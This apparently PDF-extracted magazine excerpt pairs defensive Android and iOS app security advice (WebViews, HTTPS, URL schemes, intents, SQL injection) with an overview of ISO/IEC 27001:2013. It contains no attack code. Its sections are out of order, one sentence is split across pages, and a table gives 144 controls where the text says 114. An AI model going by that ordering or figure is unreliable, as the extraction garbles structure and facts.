www.bluekaizen.org

Trying to obfuscate a secret in Android and iOS clients is a futile effort as the secrets can always be recovered using the abundance of reverse-engineering and debugging tools available for APKs (https://code.google.com/p/android-apktool/), Java (http://en.wikipedia.org/wiki/JAD_(JAva_Decompiler)), and Objective C (http://www.fscript.org/).

a. Authenticating an app to your serverOften the goal of authenticating the app to the server is to prevent users from getting phished. A good solution to phishing is to support a two-factor authentication for your application. Facebook login approvals (https://www.facebook.com/note.php?note_id=10150172618258920) is an example of a large scale two-factor authentication solution that millions of people use daily.

b. OAUTHDo not expose your OAUTH secrets to the world via your client application. Store the OAUTH secrets on your server so that they are indeed secret. To obtain an OAUTH token, the client would then request an end-point on your server that could proxy the token request to the OAUTH provider with the secret, and then, return the token to the client. Once the client obtains the OAUTH token, it can directly make requests to the OAUTH provider.

3. WebViews

AndroidSome applications use Android WebViews and store cookies in the WebViews to access the remote servers.

You should restrict the web-pages that can load inside your WebView with a whitelist. If you are only going to open pages from your domain in the WebView you should restrict those.

This will prevent others from triggering the loading of local resources such as javascript:// urls and file:// urls, which can be used to XSS users on Android. (Read more here – (http://www.80vul.com/android/android-0days.txt)

1. Use HTTPS in a secure wayHTTPS can help you protect the privacy of user data against a man-in-the-middle attack, which could manifest as snooping on data and stealing user sessions on the network.

However, to obtain this protection your app needs to perform several steps to verify the server to which it is connecting, and this process is very error-prone. Even a small mistake in verification can result in no protection at all. Read more here - http://crypto.stanford.edu/~dabo/pubs/abstracts/ssl-client-bugs.html

AndroidInstead of using the SSLSocketFactory classes, you should use APIs like HttpsURLConnection, which are simpler to use and perform the correct verification steps on your behalf. HttpsURLConnection also adds features (including TLS tickets and SNI headers, which only work correctly after Jellybean) to the HTTPS connection that gives you better performance than using raw SSL sockets. It should always be better to use this API.

iOSSimilarly, on iOS it is preferable to always use the high level API NSURLConnection for network requests. Lower level APIs such as CFStream need explicit and often error-prone configuration of SSL.

Android and iOSTo debug network requests with a proxy, such as Charles, you may prefer manually installing a SSL certificate in your testing device rather than using preprocessor variables and debug-only code to deactivate SSL validation. See more - http://www.charlesproxy.com/documentation/faqs/ssl-connections-from-within-iphone-applications/

2. There are No Client Secrets

Often, developers will spend time trying to obfuscate secrets in the application, which will be used to either authenticate their app to their server or to perform a client-side OAUTH flow.

Securitykaizen MagazineBest Practice 26

www.bluekaizen.org

permissions) that you have declared in your manifest by declaring them before you.

Your app will function normally, but as a result of this, malware that steals permissions could snoop into all of your app's content providers and other components.

To prevent this, reduce both the exposure of components and also explicitly authenticate the callers of your components.

Stealing of URL schemes [iOS]

Except for a core subset managed by iOS, URL schemes are registered on first-come, first-served basis.

6. Controlling Exposed Features

Activities, services and broadcast receivers [Android]

You should aim to expose as little of your application as possible to other applications that are potentially malicious. Not setting intent-filters on components, or explicitly setting "exported=false," will cause compo-nents to be local to your application. This is the most effective way of protecting components.

Make sure that before any action that changes the state of your app is taken, the user performs a UI action like clicking a button (this is analogous to CSRF protection in web applications). It is dangerous to perform a write action based on an intent extra passed into a component.

Exposed URL schemes [iOS]

Similarly, iOS apps should not perform state-changing actions on processing URLs without asking for confirmation from the user.

7. Watch Out for Internal URL Schemes.

In addition to exposed URL schemes, it is common to define custom URL schemes internally to an iOS or Android app so as to let trusted sources trigger specific actions.

iOSIn the simple case, a UIWebView is just a web browser tab sharing its cookie storage with the app. However, more complex interactions are often needed between the embedded JavaScript and the app. This is usually done by having the app catch and interpret URLs of a special scheme in the outgoing requests of the WebView. These interactions must be carefully reviewed. In particular,

a. if the webview is meant to browse the web, it should not be given large privileges over the native app;

b. if they include user-controlled strings (this typically includes the initial URL and any string injected in the Javascript environment using string By Evaluating Java Script From String) make sure to sanitize the native inputs of webviews

4. Tap-Jacking

AndroidOther applications can overlay content over your application, and fool users into clicking buttons on your app underneath.

To prevent this consider setting the set Filter Touches When Obscured (http://developer.android.com/reference/android/view/View.html#setFilterTouchesWhenObscured) property to true in your views. This will prevent your application from getting touches when another application is obscuring it.

iOSProofs of concept exist on iOS as well (http://www-pe r sona l . um i ch . edu/~yangq i/p i v o t/mobile_phishing_defense.pdf) although this issue should concern only jailbroken devices.

5. Race Conditions onInstalling Apps

Permission stealing [Android]

Other apps that are installed before your app, could steal android permissions (including signature level

Securitykaizen MagazineBest Practice27

www.bluekaizen.org

AndroidWhen using custom URL schemes in intent filters, be cognizant of the fact that they can be triggered by not only apps installed on the device, but also malicious websites that the user opens in the browser by simply clicking on a link. This triggers an ACTION_VIEW intent for the URL that was clicked, so that the user does not need to install malware for the malware to exploit a particular component if it has another vulnerability.

iOSMake sure to distinguish internal URLs created by trusted sources from public URLs callable by external apps or made clickable in user contents. The library class NSDataDetector does not restrict the schemes of URLs detected in user contents.

8. Authenticating Callers of Components

Androida. ActivitiesConsider calling activities that need to know their caller using startActivityForResult(). The calleeActivity can then enforce the identity of the caller using getCallingPackage()and ensures that is non-null and the package that it expects. A signature check using PackageManager is the most effective way of ensuring the caller is from the same app family as the callee.

b. Content ProvidersThe user id of the caller can be obtained using Binder.getCallingUid(), and can be used for permission enforcement via signature checks.

c. Broadcast ReceiversThere is no current way to get the identity of the initiator of the broadcast. For system broadcasts, ensure that you check the action string of the incoming intent to make sure an intent is coming from the system.

d. ServicesServices can enforce the callerusing Binder.getCallingUid() and using signature checks. However services using the messaging IPC mechanism cannot get the caller uid in the handleMessage() callback. Consider using AIDL-based service calls for exposed services.

iOSRather than UIApplicationDelegate:application:handleOpenURL:, you may want to implement UIApplicationDelegate:application:openURL:sourceApplication:annotation: and use the sourceApplication to authenticate a URL caller over time. To mitigate spoofing of callers' URL schemes, the Facebook SDK also lets callers to the main app choose an encryption key for their response.

9. Use explicit intents andIntent hijack-ing [Android]

If private data is being transmitted in an intent, use explicit intents. Explicit intents ensure that the callee receiving the intent will be the one that the caller intended to receive the intent.

Android provides ways to call components using implicit intents, however, keep in mind implicit intents could allow a malicious application to hijack the intent.

If using implicit intents, you should dynamically resolve the receivers of the intent and perform signature checks before sending the intent. "setPackage" is also an option, which restricts the package that can receive an intent. However, this works only after Ice Cream Sandwich.

10. Open redirectsYou could protect all your components with permissions and checks, however if there exists even one component in your application that takes a component as an input and redirects to that component, this could be used to circumvent all checks. Avoid this practice at all costs.

11. SQL injection

AndroidSQLLiteQueryBuilder is a standard way of building SQL queries for Android. However even though it seems to be safe against SQL injection attacks, underneath the hood its imply concatenates strings. This allows attackers to insert arbitrary clauses into the SQL statement.

You must carefully sanitize user input strings to content providers that are exposed.

Securitykaizen MagazineBest Practice 28

www.bluekaizen.org

iOSYou should refrain from constructing SQL query strings directly and instead use a more abstract framework such as EGODatabase or FMDB.

12. Language-Based Vulnerabilities[iOS]

Objective C is susceptible to a variety of programming errors that can be exploited:

* C fragments are vulnerable to the classical C vulnerabilities such as buffer overflows.

* Zombie objects may be exploited.

* User-dependent inputs occurring in format strings, selectors, or regular expressions may be exploited.

* It is important to keep in mind that static types appearing in the code are not enforced at runtime.

* Returning nil values on failures and unimplemented selectors is often ok. Yet, unexpected nil values can cause a crash with some library functions, and can yield unpredictable results in general (for instance [nil isEqualToString:nil] == 0).

Securitykaizen MagazineBest Practice29

www.bluekaizen.org

a security engineer at Facebook

Alex Rice

In this article I will provide an Overview of A new Information Security Management System Standard ISO/IEC 27001:2013 , The new standard just Published from a few Days Earlier .

ISO/IEC 27001:2013 Provides requirements for Establishing, Implementing, Maintaining and Continually Improving an Information Security Management System.

The adoption of an information security management system is a strategic decision for an organization. The establishment and implementation of an organization’s information security management system is influenced by the organization’s needs and objectives, The standard covers all types of organizations (e.g. commercial , government agencies, non-profits), all sizes (from micro-businesses to huge multinationals), and all industries/segments (e.g. retail, banking, defense, healthcare, education and government).

The Information Security Management System (ISMS) preserves the Confidentiality, Integrity and Availability of information by applying a Risk Management process and gives confidence to interested parties that Risks are adequately managed.

• Confidentiality - ensuring that access to information is appropriately authorized

• Integrity - safeguarding the accuracy and completeness of information and processing methods

• Availability - ensuring that authorized users have access to information when they need it.

An OverviewISO/IEC 27001:2013

www.bluekaizen.org

Securitykaizen MagazineBest Practice 30

Securitykaizen MagazineBest Practice31

ISO 27001 History

• 1992The Department of Trade and Industry (DTI), which is part of the UK Government, publish a 'Code of Practice for Information Security Management'.

• 1995This document is amended and re-published by the British Standards Institute (BSI) as BS7799.

• 2000In December, BS7799 is again re-published, this time as a fast tracked ISO standard. It becomes ISO/IEC 17799

• 2005ISO/IEC 27001:2005 is published, this is a specification for an ISMS (information security management system), which aligns with ISO 17799 and is compatible with ISO 9001 and ISO 14001.

• 2013 ISO/IEC 27001:2013 A New information security standard published on the 25/09/2013. It cancels and replaces ISO 27001:2005

ISO 27001 Family The Family of ISO 27000 provides best practice recommendations on information security management, risks and controls within the context of an overall information security management system (ISMS), Alignment to management systems for quality assurance ISO 9000 Family

ISO 27000: Vocabulary

ISO 27001: Information Security Management System Requirements

ISO 27002: Code of Practices

ISO 27003: Information technology - Security techniques - Information security management system implementation guidance - Published 2010

ISO 27004: Information technology - Security techniques - Information security management - Measurement - Published 2009

1992 Code of Practice for ASecurity Man-agement

1995British Standards Institute (BSI) BS7799

2013 ISO/IEC 27001:2013 2005

ISO/IEC 27001:2005 2000

ISO/IEC 17799

www.bluekaizen.org

Securitykaizen MagazineBest Practice 32

ISO 27005: Information technology -- Security techniques -- Information security risk management - Published 2011

ISO 27006: Information technology -- Security techniques -- Requirements for bodies providing audit and certification of information security management systems - Published 2011

ISO 27007-ISO 27008: Information technology -- Security techniques -- Guidelines for auditors on information security controls - Published 2011

ISO 27011: Information technology -- Security techniques -- Information security management guidelines for telecommunications organizations based on ISO/IEC 27002 - Published 2008

ISO 27799: Health informatics -- Information security management in health using ISO/IEC 27002Published 2008

Benefits of ISO 27001ISO/IEC 27001:2013 Implementation, Certification from a certification body demonstrates that the security of organization information has been addressed, valuable data and information assets properly controlled.

Also there is List of benefits By achieving certification to ISO/IEC 27001:2013 organization will be able to acquire numerous benefits including:

ISO /IEC 27001:2013 Structure and Content It’s a new format and wording of Information Security Management System ( ISMS )

This structure is a new formulation of ISO Management System and alignment with “ Annex SL “ that allows an organization to Made multiple implementation at the same time for related ISO Management Standard.

Now any organization can Implement ISO/IEC 27001:2013 Together with ISO 22301:2012 (Business Continuity Management System) at same time.

www.bluekaizen.org

Securitykaizen MagazineBest Practice33

Structure All Below from 4 to 10 are Mandatory Requirements for Implementation and Certification of ISO/IEC 27001:2013

0. Introduction The Objective of an Information Security Management System (ISMS) 1. Scope State the Applicability of Standard within Context of Organization 2. Normative References Overview and Vocabulary 3. Terms and Definitions a brief, formalized glossary Including Common Terms and Definition of ISMS 4. Context of Organization It has to determine organization needs and Expectations and Interested Parities 5. Leadership Establish role of Top management toward ISMS 6. Planning Establish Organization Strategic Objects and Risk Management 7. Support Determined Organizational Resources and Competencies Requirements and Standard Documentation Required 8. Operation The Information Security Requirements of the ISMS and way to address it 9. Performance Evaluation Measurement of ISMS Performance 10. Improvement Identify and act toward nonconformity of ISMS through Corrective Action and Ensure of Continual improvement of ISMS

Annex A Control Objective and Controls List of Control area and control objectives and Controls of ISMS

Annex A Control Objective and Controls : 114 Security Controls Annex A is the best known series of security control objectives for Implementation ISO/IEC 27001:2013

All Controls are Optional to be implemented Annex A Consist of »14 Control Area : Core topic areas that Covered Most Aspects of Information Security » 34 Control Objective : Objectives of Control » 114 Control : Applicable Controls to be Implemented on ISMS Program

A.5: Information Security Policies Manage and Update of Organization Information Security Policies

A.6: Organization of Information Security Manage of Organization Information including: Identified Role and Responsibilities, Segregation of Duties, Mobile Devices and teleworking

A.7: Human resources security Manage of Organization Human Resource including: During, prior Employment Relationship

www.bluekaizen.org

Securitykaizen MagazineBest Practice 34

Control Area Number of ControlsAnnex A No

Operations security 14A12

Asset management 10A8

Information Security Incident management 7A16

Organization of Information Security 7A6

System acquisition, development, and maintenance 13A14

Cryptographic 2A10

Compliance 8A18

Information Security Policies 2A5

Communications Security 7A13

Access Control 14A9

Information Security aspects of Business Continuity 4A17

Human resources security 6A7

Supplier Relationship 5A15

Physical and environmental Security 15A11

144Total Number of Controls

A.8: Asset management Manage of Organization Assets

A.9: Access Control Manage and Control Access of Organization Information

A.10: Cryptographic Control of Using Cryptographic inside Organization

A.11: Physical and environmental Security Manage and Control of Organization Physical and environmental Access

A.12: Operations security Manage and control all Operation security including : Operational Procedure and Responsibilities , logging and Monitoring , Technical vulnerability management and information systems audit

A.13: Communications Security Manage and control Organization Communication Security including : Network security management and information transfer Controls

A.14: System acquisition, development, and maintenance Manage and control System Development Cycle Including: identified and enforce security requirements , Secure of development system

A.15: Supplier Relationship Manager suppliers relationship including : apply information security for supplier relationship and service delivery management

A.16: Information Security Incident management Manage information security incident

A.17: Information Security aspects of Business Continuity Management Manage information security Continuity and Redundancies

A.18: Compliance Manage organization compliance with legal and contractual requirements

www.bluekaizen.org

Securitykaizen MagazineBest Practice35

The ISO/IEC 27001:2013 Certification Process

There are Three Core Phases Phase I : Before External Audit 1. Implementation of ISMS Complete of implementation cycle of Information security management system ( ISMS) Including mandatory Requirements and optional Controls 2. Conduct Internal Audit and review result by top management The organization conduct periodic internal audits to ensure the ISMS incorporates adequate controls which operate effectively and review it by Top Management 3. Selection of a Certification body Organization select a Certification body “ BSI , DNV, SGS “ to conduct External audit activity and Certified Organization ISMS Program

Phase II : External Audit 4. Stage 1 Audit Conducted off or on site to determine if your ISMS system has met the requirements of the standard and is capable of being audited.5. Stage 2 Audit Conduct on site to audit the effectiveness of the ISMS system. Stage 1 and Stage 2 must be completed to become ISMS certified.

Phase III : Following the audit 6. Confirmation of Registration Lead Auditor recommend to Certification Manager of Certification Body that Organization are certified.The Certification Manager will review Organization file to ensure that the recommendation has been made in an impartial, fair and competent manner.Upon completion of the above Organization will be officially certified to ISO/IEC 27001:2013 .7. Continual improvement and Surveillance auditsConduct Internal Audit Activity by Organization and Certification body auditor will conduct surveillance audit for organization every 6 months or 12 months for next three years after organization achieve ISO/IEC 27001:2013 Certification

www.bluekaizen.org

Securitykaizen MagazineBest Practice 36

Estimated Time needed for Implementation and Certification ISO/IEC 27001:2013

Based on my Experience Phase I : Estimated time needed for Implementation ISO/IEC 27001:2013Estimated Duration needed for Implementation depend on Organization size “ Employees, Systems and Information “• Small Organization : 50 - 150 Employee Estimated time for Implementation of Standard from 6-8 Months • Medium Organization : 150 – 400 Employee Estimated time for Implementation of Standard from 10-12 Months • Large Organization : 400 to 1000+ EmployeeEstimated time for Implementation of Standard from 13-16 Months

Phase II : Estimated Time needed for Certification ISO/IEC 27001:2013 Case 1 : if there is one or more Minor Nonconformity and the organization try to Correct them accordingly the Certificate can be Issued around a Month Case 2 : if there is one or more Major Nonconformity and the organization try to Correct them accordingly the Certificate can be Issued around 3-5 Months

ConclusionISO/IEC 27001:2013 gives Organization a Perfect Information Security management framework for implementing

and maintaining security.In this Article, I tried to shed some light on new standard and its Mandatory Requirements, Optional Requirements , Structure , Benefits , Certification Process and Estimated time for Implementation and Certification.

References • ISO/IEC 27001:2013 Information technology - Security techniques - Information security management systems - Requirements• ISO/IEC 27002:2013 Information technology - Security techniques - Code of practice for information security controls• The FDIS versions of ISO 27001 and ISO 27002• http://www.pc-history.org/17799.htm

www.bluekaizen.org

MBCI, CBCP, ISO 27001 LA/LI, ISO 22301 LASenior Information Security Auditorat The Egyptian Credit Bureau "I-Score”

Ahmed Riad

For More Info: +971 0503047401